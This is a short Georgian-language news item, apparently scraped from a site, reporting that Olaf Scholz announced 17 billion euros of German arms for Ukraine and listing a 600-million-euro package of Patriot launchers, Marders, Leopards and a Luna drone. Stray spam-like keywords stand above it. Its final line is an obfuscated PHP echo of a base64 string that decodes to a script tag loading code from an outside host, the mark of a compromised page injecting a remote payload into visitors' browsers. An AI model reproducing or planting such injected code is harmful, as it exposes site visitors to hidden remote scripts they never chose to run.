gorgia
ავერსი jaluzi

გერმანია უკრაინას მომდევნო ხუთი წლის განმავლობაში 17 მილიარდი ევროს ღირებულების შეიარაღებას მიაწვდის. ამის შესახებ გერმანიის კანცლერმა, ოლაფ შოლცმა განაცხადა.

რამდენიმე დღის წინ გერმანიამ უკრაინას 600 მილიონი ევროს ღირებულების დახმარების პაკეტი დაუმტკიცა.

თავდაცვის სამინისტროს ინფორმაციით, მასში ჰაერსაწინააღმდეგო თავდაცვითი სისტემა „პეტრიოტის“ ორი გამშვები დანადგარიც იქნება გათვალისწინებული. ასევე, პაკეტი მოიცავს „მარდერის“ ტიპის 40-მდე საბრძოლო მანქანას, „ლეოპარდის“ ტიპის 25 ტანკსა და ერთ ერთეულ უპილოტო საფრენ აპარატ „ლუნას“.

შოლცის თქმით, აშშ-ის შემდეგ გერმანია გახდება უკრაინისთვის სამხედრო დახმარების ყველაზე მსხვილი მიმწოდებელი ქვეყანა.

396
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");